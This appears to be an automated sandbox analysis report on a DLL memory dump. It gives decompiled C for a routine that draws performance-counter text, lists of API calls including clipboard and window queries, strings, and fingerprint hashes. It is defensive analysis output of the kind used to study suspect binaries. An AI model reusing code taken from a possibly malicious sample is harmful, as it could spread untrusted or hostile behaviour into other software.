CoTaskMemFree.OLE32(00000000,?,2B098C7C,00000000,00000000), ref: 6E4BF9E5
CoTaskMemFree.OLE32(00000000,2B098C7C,00000000,00000000), ref: 6E4BFA03
lstrcmpiW.KERNEL32(?,6E4F8D3C,?,?,C000008C,00000000,00000000), ref: 6E4BFABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E4BFADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E4BFBA1

Strings

HKCU{Software{Classes, xrefs: 6E4BF82A
HKCR, xrefs: 6E4BF800
}}, xrefs: 6E4BF8B0

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc_wcsstr
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2771584749-1142484189
Opcode ID: 7e3b7542898b3695c286feba03e76fc9612310bcbb288d523655c78d84182891
Instruction ID: 8a4259ed2cfa9170760cd9618330c89f741b51e60c624112ea4501043cccceab
Opcode Fuzzy Hash: 7e3b7542898b3695c286feba03e76fc9612310bcbb288d523655c78d84182891
Instruction Fuzzy Hash: ACE1A33990521A9FDB149FF8CC94F9EB7B5EF09704F20456AD909EB385EB309944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E6E4C1CD0(signed int __ecx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				signed int _v32;
				char _v548;
				char _v1060;
				short _v3108;
				char _v5156;
				intOrPtr _v5160;
				signed int _v5164;
				int _v5168;
				int _v5172;
				int _v5176;
				int _v5180;
				char _v5184;
				char _v5188;
				struct tagRECT _v5204;
				intOrPtr _v5208;
				signed int _v5212;
				int _v5216;
				int _v5220;
				int _v5224;
				int _v5228;
				char _v5232;
				char _v5236;
				struct tagTEXTMETRICW _v5296;
				WCHAR* _v5300;
				signed int _v5304;
				signed short* _v5308;
				struct HDC__* _v5312;
				char _v5316;
				int _v5320;
				signed int _v5324;
				signed int _v5328;
				intOrPtr* _v5332;
				intOrPtr _v5336;
				char _v5340;
				void* __ebx;
				void* __ebp;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				signed int _t200;
				intOrPtr _t201;
				intOrPtr _t232;
				intOrPtr _t241;
				int _t244;
				void* _t247;
				void* _t250;
				signed int _t251;
				signed int _t264;
				intOrPtr _t266;
				signed int _t271;
				signed short* _t279;
				signed short* _t287;
				signed int _t290;
				signed int _t294;
				void* _t300;
				intOrPtr _t317;
				intOrPtr* _t319;
				signed short _t324;
				void* _t325;
				intOrPtr _t327;
				signed int _t328;
				signed short* _t330;
				signed short _t332;
				intOrPtr _t335;
				void* _t339;
				unsigned int _t342;
				signed short _t343;
				intOrPtr* _t344;
				signed short* _t347;
				signed int _t348;
				signed int _t352;
				intOrPtr* _t354;
				signed short* _t355;
				struct HDC__* _t357;
				void* _t358;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr _t367;
				intOrPtr* _t368;
				void* _t371;
				void* _t373;
				intOrPtr* _t374;
				intOrPtr _t375;
				signed int _t378;
				void* _t380;
				signed int _t383;
				void* _t387;
				void* _t388;
				void* _t391;
				void* _t413;

				_t413 = __fp0;
				_t300 = _t380;
				_t383 = (_t380 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t300 + 4));
				_t378 = _t383;
				_push(0xffffffff);
				_push(0x6e4e9dab);
				_push( *[fs:0x0]);
				_push(_t300);
				E6E4E8580();
				_t193 =  *0x6e4ff008; // 0x2b098c7c
				_t194 = _t193 ^ _t378;
				_v32 = _t194;
				_push(_t194);
				 *[fs:0x0] =  &_v24;
				_t365 = __ecx;
				_v5324 = __ecx;
				_t335 =  *((intOrPtr*)(__ecx + 0x78));
				_v5312 =  *((intOrPtr*)(_t300 + 8));
				_t197 =  *((intOrPtr*)(__ecx + 0x7c));
				if(_t335 != _t197) {
					_t352 =  *(__ecx + 0x8c);
					_t200 = _t197 - _t335 >> 4;
					if(_t200 <= _t352) {
						_t352 = _t200 - 1;
						 *(__ecx + 0x8c) = _t352;
					}
					_t354 = (_t352 << 4) + _t335;
					_v5332 = _t354;
					_t201 =  *((intOrPtr*)(_t354 + 4));
					if(_t201 !=  *((intOrPtr*)(_t354 + 8))) {
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x1468], xmm0");
						asm("movups [ebp-0x1458], xmm0");
						__imp__PdhCollectQueryData( *((intOrPtr*)(_t365 + 0x40)));
						if(_t201 == 0) {
							asm("xorps xmm0, xmm0");
							_t306 =  &_v5188;
							asm("movups [ebp-0x1438], xmm0");
							asm("movups [ebp-0x1428], xmm0");
							E6E4C4480(_t300,  &_v5188, _t413);
							_v16 = 0;
							_t365 =  *(_t365 + 0x44);
							__eflags = _t365 -  *((intOrPtr*)(_v5324 + 0x48));
							if(__eflags != 0) {
								_t363 = __imp__PdhGetFormattedCounterValue;
								do {
									_t294 =  *_t363( *((intOrPtr*)(_t365 + 0x18)), 0x200, 0,  &_v5204);
									__eflags = _t294;
									if(_t294 == 0) {
										_t306 =  &_v5188;
										E6E4C4740(_t300,  &_v5188, _t413,  &_v5340, _t365);
										asm("movsd xmm0, [ebp-0x1440]");
										asm("movsd [eax+0x20], xmm0");
									}
									_t365 = _t365 + 0x1c;
									__eflags = _t365 -  *((intOrPtr*)(_v5324 + 0x48));
								} while (__eflags != 0);
								_t354 = _v5332;
							}
							_v5236 = _v5188;
							_v5228 = 0;
							_v5184 = E6E4C4950(_t306, _t335, __eflags, 0, 0);
							_v5232 = _v5184;
							_v5228 = _v5180;
							_v5224 = _v5176;
							_v5220 = _v5172;
							_v5216 = _v5168;
							_v5212 = _v5164;
							_v5180 = _v5228;
							_v5176 = 0;
							_v5172 = 0;
							_v5168 = 0;
							_v5208 = _v5160;
							_v16 = 1;
							E6E4C2E30(_t300,  &_v5184, _t354);
							__eflags = _v5168 - _v5176 >> 2 - 0x10;
							if(_v5168 - _v5176 >> 2 < 0x10) {
								E6E4BCA70( &_v5176, _t335, _t413, 0x10);
							}
							_v5316 = _v5184;
							E6E4BC7A0(_t300,  &_v5176, _t354, _t365, _t413, 0x10,  &_v5316);
							_v5164 = 7;
							_v5160 = 8;
							E6E4C23F0(_t300,  &_v5188, _t354, _t365, _t413);
						} else {
							E6E4C4480(_t300,  &_v5236, _t413);
						}
						GetTextMetricsW(_v5312,  &_v5296);
						E6E4C9520(_t354,  &_v3108, 0, 0x800);
						E6E4C9520(_t354,  &_v5156, 0, 0x800);
						_t387 = _t383 + 0x18;
						_v5328 = 0;
						if(((0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5) != 0) {
							_t232 = 0;
							_v5316 = 0;
							do {
								_v3108 = 0;
								_t367 =  *((intOrPtr*)(_t354 + 4));
								_t355 =  *(_t367 + _t232 + 0x28);
								_t368 = _t367 + _t232;
								_v5320 = _t368;
								_v5308 = _t355;
								if(_t355 !=  *((intOrPtr*)(_t368 + 0x2c))) {
									asm("o16 nop [eax+eax]");
									do {
										_t343 = _t355;
										_t324 = _t355[8];
										if(_t355[0xa] >= 8) {
											_t343 =  *_t355;
										}
										_t373 = _t324 + _t324;
										_t263 = 0x811c9dc5;
										_t325 = 0;
										if(_t373 != 0) {
											_t362 = 0x811c9dc5;
											do {
												_t290 =  *(_t325 + _t343) & 0x000000ff;
												_t325 = _t325 + 1;
												_t362 = (_t290 ^ _t362) * 0x1000193;
											} while (_t325 < _t373);
											_v5304 = _t362;
											_t355 = _v5308;
											_t263 = _v5304;
										}
										_t264 = _t263 & _v5212;
										_v5304 = _t264;
										_t344 =  *((intOrPtr*)(_v5224 + _t264 * 8));
										_t374 = _t344;
										_v5336 = _t344;
										while(1) {
											_t327 = _v5232;
											if(_t344 != _t327) {
												_t266 =  *((intOrPtr*)( *((intOrPtr*)(_v5224 + 4 + _t264 * 8))));
											} else {
												_t266 = _t327;
											}
											if(_t374 == _t266) {
												break;
											}
											_t347 = _t374 + 8;
											_v5300 = _t347;
											_t287 = _t355;
											if(_t355[0xa] >= 8) {
												_t287 =  *_t355;
											}
											_t332 = _t347[8];
											if(_t347[0xa] >= 8) {
												_t347 =  *_t347;
												_v5300 = _t347;
											}
											if(_t332 != _t355[8]) {
												L41:
												_t374 =  *_t374;
												_t264 = _v5304;
												_t344 = _v5336;
												continue;
											} else {
												if(_t332 == 0) {
													L42:
													__eflags = E6E4BDCB0(_t355, _t374 + 8);
													_t375 =  !=  ? _v5232 : _t374;
												} else {
													_t348 =  *_t347 & 0x0000ffff;
													_t355 = _v5308;
													if(_t348 >= ( *_t287 & 0x0000ffff)) {
														_v5300 = _v5300 - _t287;
														asm("o16 nop [eax+eax]");
														while(1) {
															_t355 = _v5308;
															if(_t348 > ( *_t287 & 0x0000ffff)) {
																goto L41;
															}
															if(_t332 == 1) {
																goto L42;
															} else {
																_t287 =  &(_t287[1]);
																_t332 = _t332 - 1;
																_t348 =  *(_v5300 + _t287) & 0x0000ffff;
																_t355 = _v5308;
																if(_t348 >= ( *_t287 & 0x0000ffff)) {
																	continue;
																} else {
																	goto L41;
																}
															}
															goto L44;
														}
													}
													goto L41;
												}
											}
											goto L44;
										}
										_t375 = _t327;
										L44:
										E6E4C9520(_t355,  &_v548, 0, 0x200);
										_t388 = _t387 + 0xc;
										__eflags = _t375 - _v5232;
										if(__eflags != 0) {
											asm("movsd xmm1, [edi+0x50]");
											asm("xorps xmm2, xmm2");
											asm("comisd xmm1, xmm2");
											asm("movsd xmm0, [esi+0x20]");
											asm("movsd [ebp-0x14d0], xmm0");
											if(__eflags > 0) {
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0x14d0], xmm0");
											}
											E6E4C9520(_t355,  &_v1060, 0, 0x200);
											_t271 = _t355[0x26];
											_t328 = _t355[0x24];
											__eflags = _t271;
											_push("f");
											_t272 =  <=  ? 0 : _t271;
											_push( <=  ? 0 : _t271);
											__eflags = _t328;
											_t329 =  <=  ? 0 : _t328;
											E6E4BE190( &_v1060, 0x100, L"%s%d.%d%s", "%");
											asm("movsd xmm0, [ebp-0x14d0]");
											asm("movsd [esp], xmm0");
											E6E4BE190( &_v548, 0x100,  &_v1060,  <=  ? 0 : _t328);
											_t391 = _t388 + 0x34;
										} else {
											E6E4D64B0( &_v548, 0x100, L"[N/A]");
											_t391 = _t388 + 0xc;
										}
										__eflags = _t355[0x22] - 8;
										_t330 =  &(_t355[0x18]);
										if(_t355[0x22] >= 8) {
											_t330 =  *_t330;
										}
										__eflags = _t355[0x16] - 8;
										_t279 =  &(_t355[0xc]);
										if(_t355[0x16] >= 8) {
											_t279 =  *_t279;
										}
										_push(_t330);
										_push( &_v548);
										E6E4BE190( &_v5156, 0x400, L"%s%s%s", _t279);
										E6E4D643B( &_v3108, 0x400,  &_v5156);
										_t368 = _v5320;
										_t355 =  &(_t355[0x2c]);
										_t387 = _t391 + 0x24;
										_v5308 = _t355;
										__eflags = _t355 -  *((intOrPtr*)(_t368 + 0x2c));
									} while (_t355 !=  *((intOrPtr*)(_t368 + 0x2c)));
								}
								GetClientRect( *(_v5324 + 0x18),  &_v5204);
								_v5300 = _t368;
								_t317 =  *((intOrPtr*)(_t300 + 0x10));
								_v5204.top = _v5204.top + (_v5296.tmHeight - _v5296.tmExternalLeading) * _v5328 +  *_v5332 + _t317;
								_t241 =  *((intOrPtr*)(_t300 + 0xc));
								_v5204.bottom = _v5204.bottom + _t317;
								_v5204.left = _v5204.left + _t241;
								_v5204.right = _v5204.right + _t241;
								__eflags =  *((intOrPtr*)(_t368 + 0x14)) - 8;
								if( *((intOrPtr*)(_t368 + 0x14)) >= 8) {
									_v5300 =  *_t368;
								}
								__eflags =  *((char*)(_v5320 + 0x18));
								_t370 =  !=  ? 0x2bc : 0;
								_t244 = GetDeviceCaps(_v5312, 0x5a);
								asm("cvttsd2si ecx, [ecx+0x20]");
								_t247 = CreateFontW( ~(MulDiv(_v5320, _t244, 0x48)), 0, 0, 0,  !=  ? 0x2bc : 0,  *(_t368 + 0x19) & 0x000000ff, 0, 0, 0, 0, 0, 0, 0, _v5300);
								_t357 = _v5312;
								_t371 = _t247;
								SetTextColor(_t357,  *(_v5320 + 0x1c));
								_t250 = SelectObject(_t357, _t371);
								_t319 =  &_v3108;
								_t358 = _t250;
								_t339 = _t319 + 2;
								do {
									_t251 =  *_t319;
									_t319 = _t319 + 2;
									__eflags = _t251;
								} while (_t251 != 0);
								DrawTextW(_v5312,  &_v3108, _t319 - _t339 >> 1,  &_v5204, 0);
								SelectObject(_v5312, _t358);
								DeleteObject(_t371);
								_t354 = _v5332;
								_v5316 = _v5316 + 0x38;
								_t365 = _v5328 + 1;
								_v5328 = _t365;
								_t342 = (0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5;
								__eflags = _t365 - (_t342 >> 0x1f) + _t342;
								_t232 = _v5316;
							} while (_t365 < (_t342 >> 0x1f) + _t342);
						}
						E6E4C23F0(_t300,  &_v5236, _t354, _t365, _t413);
					}
				}
				 *[fs:0x0] = _v24;
				__eflags = _v32 ^ _t378;
				return E6E4C4D4A(_v32 ^ _t378);
			}

0x6e4c1cd0
0x6e4c1cd1
0x6e4c1cd9
0x6e4c1ce0
0x6e4c1ce4
0x6e4c1ce6
0x6e4c1ce8
0x6e4c1cf3
0x6e4c1cf4
0x6e4c1cfa
0x6e4c1cff
0x6e4c1d04
0x6e4c1d06
0x6e4c1d0b
0x6e4c1d0f
0x6e4c1d15
0x6e4c1d17
0x6e4c1d20
0x6e4c1d23
0x6e4c1d29
0x6e4c1d2e
0x6e4c1d34
0x6e4c1d3c
0x6e4c1d41
0x6e4c1d43
0x6e4c1d46
0x6e4c1d46
0x6e4c1d4f
0x6e4c1d51
0x6e4c1d57
0x6e4c1d5d
0x6e4c1d66
0x6e4c1d69
0x6e4c1d70
0x6e4c1d77
0x6e4c1d7f
0x6e4c1d91
0x6e4c1d94
0x6e4c1d9a
0x6e4c1da1
0x6e4c1da8
0x6e4c1db3
0x6e4c1dba
0x6e4c1dbd
0x6e4c1dc0
0x6e4c1dc2
0x6e4c1dd0
0x6e4c1de1
0x6e4c1de3
0x6e4c1de5
0x6e4c1def
0x6e4c1df5
0x6e4c1e00
0x6e4c1e08
0x6e4c1e08
0x6e4c1e13
0x6e4c1e16
0x6e4c1e16
0x6e4c1e1b
0x6e4c1e1b
0x6e4c1e2b
0x6e4c1e31
0x6e4c1e46
0x6e4c1e52
0x6e4c1e5e
0x6e4c1e6a
0x6e4c1e76
0x6e4c1e82
0x6e4c1e8e
0x6e4c1e9a
0x6e4c1ea0
0x6e4c1eaa
0x6e4c1eb4
0x6e4c1ebe
0x6e4c1eca
0x6e4c1ece
0x6e4c1ee2
0x6e4c1ee5
0x6e4c1eef
0x6e4c1eef
0x6e4c1f00
0x6e4c1f0f
0x6e4c1f1a
0x6e4c1f24
0x6e4c1f2e
0x6e4c1d81
0x6e4c1d87
0x6e4c1d87
0x6e4c1f40
0x6e4c1f54
0x6e4c1f6a
0x6e4c1f7a
0x6e4c1f7f
0x6e4c1f95
0x6e4c1f9b
0x6e4c1f9d
0x6e4c1fa3
0x6e4c1fa5
0x6e4c1fac
0x6e4c1faf
0x6e4c1fb3
0x6e4c1fb5
0x6e4c1fbb
0x6e4c1fc4
0x6e4c1fca
0x6e4c1fd0
0x6e4c1fd4
0x6e4c1fd6
0x6e4c1fd9
0x6e4c1fdb
0x6e4c1fdb
0x6e4c1fdd
0x6e4c1fe0
0x6e4c1fe5
0x6e4c1fe9
0x6e4c1feb
0x6e4c1ff0
0x6e4c1ff0
0x6e4c1ff4
0x6e4c1ff7
0x6e4c1ffd
0x6e4c2001
0x6e4c2007
0x6e4c200d
0x6e4c200d
0x6e4c2013
0x6e4c201f
0x6e4c2025
0x6e4c2028
0x6e4c202a
0x6e4c2030
0x6e4c2030
0x6e4c2038
0x6e4c2048
0x6e4c203a
0x6e4c203a
0x6e4c203a
0x6e4c204c
0x00000000
0x00000000
0x6e4c2056
0x6e4c2059
0x6e4c205f
0x6e4c2061
0x6e4c2063
0x6e4c2063
0x6e4c2069
0x6e4c206c
0x6e4c206e
0x6e4c2070
0x6e4c2070
0x6e4c2079
0x6e4c20cf
0x6e4c20cf
0x6e4c20d1
0x6e4c20d7
0x00000000
0x6e4c207b
0x6e4c207d
0x6e4c20e2
0x6e4c20ec
0x6e4c20ee
0x6e4c207f
0x6e4c2082
0x6e4c2088
0x6e4c208e
0x6e4c2090
0x6e4c2096
0x6e4c20a0
0x6e4c20a6
0x6e4c20ac
0x00000000
0x00000000
0x6e4c20b1
0x00000000
0x6e4c20b3
0x6e4c20b9
0x6e4c20bc
0x6e4c20c0
0x6e4c20c7
0x6e4c20cd
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4c20cd
0x00000000
0x6e4c20b1
0x6e4c20a0
0x00000000
0x6e4c208e
0x6e4c207d
0x00000000
0x6e4c2079
0x6e4c20f7
0x6e4c20f9
0x6e4c2107
0x6e4c210c
0x6e4c210f
0x6e4c2115
0x6e4c2135
0x6e4c213a
0x6e4c213d
0x6e4c2141
0x6e4c2146
0x6e4c214e
0x6e4c2150
0x6e4c2154
0x6e4c2154
0x6e4c216a
0x6e4c216f
0x6e4c2175
0x6e4c217a
0x6e4c217c
0x6e4c2181
0x6e4c2184
0x6e4c2187
0x6e4c2189
0x6e4c21a3
0x6e4c21a8
0x6e4c21b9
0x6e4c21cb
0x6e4c21d0
0x6e4c2117
0x6e4c2128
0x6e4c212d
0x6e4c212d
0x6e4c21d3
0x6e4c21d7
0x6e4c21da
0x6e4c21dc
0x6e4c21dc
0x6e4c21de
0x6e4c21e2
0x6e4c21e5
0x6e4c21e7
0x6e4c21e7
0x6e4c21e9
0x6e4c21f0
0x6e4c2203
0x6e4c221b
0x6e4c2220
0x6e4c2226
0x6e4c2229
0x6e4c222c
0x6e4c2232
0x6e4c2232
0x6e4c1fd0
0x6e4c224b
0x6e4c226a
0x6e4c2272
0x6e4c2277
0x6e4c227d
0x6e4c2280
0x6e4c2286
0x6e4c228c
0x6e4c2292
0x6e4c2296
0x6e4c229a
0x6e4c229a
0x6e4c22b4
0x6e4c22bd
0x6e4c22c0
0x6e4c22cf
0x6e4c22fa
0x6e4c2300
0x6e4c2306
0x6e4c2312
0x6e4c231a
0x6e4c2320
0x6e4c2326
0x6e4c2328
0x6e4c2330
0x6e4c2330
0x6e4c2333
0x6e4c2336
0x6e4c2336
0x6e4c2356
0x6e4c2363
0x6e4c236a
0x6e4c2370
0x6e4c2381
0x6e4c2388
0x6e4c2389
0x6e4c2399
0x6e4c23a3
0x6e4c23a5
0x6e4c23a5
0x6e4c1fa3
0x6e4c23b7
0x6e4c23b7
0x6e4c1d5d
0x6e4c23bf
0x6e4c23cc
0x6e4c23d9

APIs

PdhCollectQueryData.PDH(?,2B098C7C,?,?,?,?,6E4E9DAB,000000FF), ref: 6E4C1D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E4E9DAB,000000FF), ref: 6E4C1DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E4C1F40
GetClientRect.USER32(?,?), ref: 6E4C224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E4C22C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E4C22D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E4C22FA
SetTextColor.GDI32(?,?), ref: 6E4C2312
SelectObject.GDI32(?,00000000), ref: 6E4C231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E4C2356
SelectObject.GDI32(?,00000000), ref: 6E4C2363
DeleteObject.GDI32(00000000), ref: 6E4C236A

Strings

[N/A], xrefs: 6E4C2117
%s%d.%d%s, xrefs: 6E4C2198
%s%s%s, xrefs: 6E4C21F2

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 6b9bcdb35f9a47bd6ea5c876dddc241976a1e4cf6aceaef9b15fa6861bf21e8e
Instruction ID: 42810302447f8fdbeaf955723daa0e2b4bab108018f8cb589fbbc84dde0b12b1
Opcode Fuzzy Hash: 6b9bcdb35f9a47bd6ea5c876dddc241976a1e4cf6aceaef9b15fa6861bf21e8e
Instruction Fuzzy Hash: F8128B759006299FCB64CF68CC80ADAB7B9FF49704F0442DAE509A7261DB70AEC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B61A1
AnyPopup.USER32 ref: 6E4B6305
GetCurrentThread.KERNEL32 ref: 6E4B6401

Part of subcall function 6E4B5A30: IsSystemResumeAutomatic.KERNEL32 ref: 6E4B5BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6355

Part of subcall function 6E4B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
Part of subcall function 6E4B5A30: CloseClipboard.USER32 ref: 6E4B5A73
Part of subcall function 6E4B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6E4B6935), ref: 6E4B64B0
GetClipboardViewer.USER32 ref: 6E4B5F76

Part of subcall function 6E4B5C20: UnregisterApplicationRestart.KERNEL32 ref: 6E4B5C40
Part of subcall function 6E4B5C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5CAC

GetSystemDefaultLangID.KERNEL32 ref: 6E4B5FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B6081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B6108
GetCurrentThread.KERNEL32 ref: 6E4B612E

Part of subcall function 6E4B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
Part of subcall function 6E4B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
Part of subcall function 6E4B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
Part of subcall function 6E4B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: 4529080fb63c7c27641d4359eafb99e9d88c1dadcd017f67932a2f09eafa0ac7
Instruction ID: a478c5c069cad7eff5c02875c5e5dff46b8cc7bde0fe53061516278d9deebea1
Opcode Fuzzy Hash: 4529080fb63c7c27641d4359eafb99e9d88c1dadcd017f67932a2f09eafa0ac7
Instruction Fuzzy Hash: A4E12831D24F444AC613DEB694115ABF3AF6FEF6C4F048B2BF406B6152FB2598E28590

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5F10, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E4E622F,?,00000000), ref: 6E4E5FA9
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E4E622F,?,00000000), ref: 6E4E5FD2
GetACP.KERNEL32(?,?,6E4E622F,?,00000000), ref: 6E4E5FE7

Strings

ACP, xrefs: 6E4E5F2E
OCP, xrefs: 6E4E5F64
/bNn, xrefs: 6E4E5FC7, 6E4E5F9E

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: /bNn$ACP$OCP
API String ID: 2299586839-3341605620
Opcode ID: 19c734c7416ce6f3209004bd978e1d27d4c2736c98881e09d518b77c19e89b2f
Instruction ID: f3dd5ea471c9f2b488b92786d1fc727844dd679b88df1e52a75737cb73f2e817
Opcode Fuzzy Hash: 19c734c7416ce6f3209004bd978e1d27d4c2736c98881e09d518b77c19e89b2f
Instruction Fuzzy Hash: F221D332A14205ABE7688FF5C904E8773B6AB45B62B528466E809CBB08FB36DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C84C5
HeapAlloc.KERNEL32(00000000), ref: 6E4C84CC
InitializeSListHead.KERNEL32(00000000), ref: 6E4C84D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E4C84EE
HeapFree.KERNEL32(00000000), ref: 6E4C84F5

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 1d438fd1963b9ee96e28c6b4c3fa844ec3fe44fbbfa86ac3eacb8c2d52a8e70a
Instruction ID: 1b08ac23803ebe0a30c0e13048a0c01afb25c9519b3e1326fb9c4b73a3f28821
Opcode Fuzzy Hash: 1d438fd1963b9ee96e28c6b4c3fa844ec3fe44fbbfa86ac3eacb8c2d52a8e70a
Instruction Fuzzy Hash: 9BF06236200B029BDB51AFB99C18F1776B8BF8AB66F01482EF945D3349EF30F4008661

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

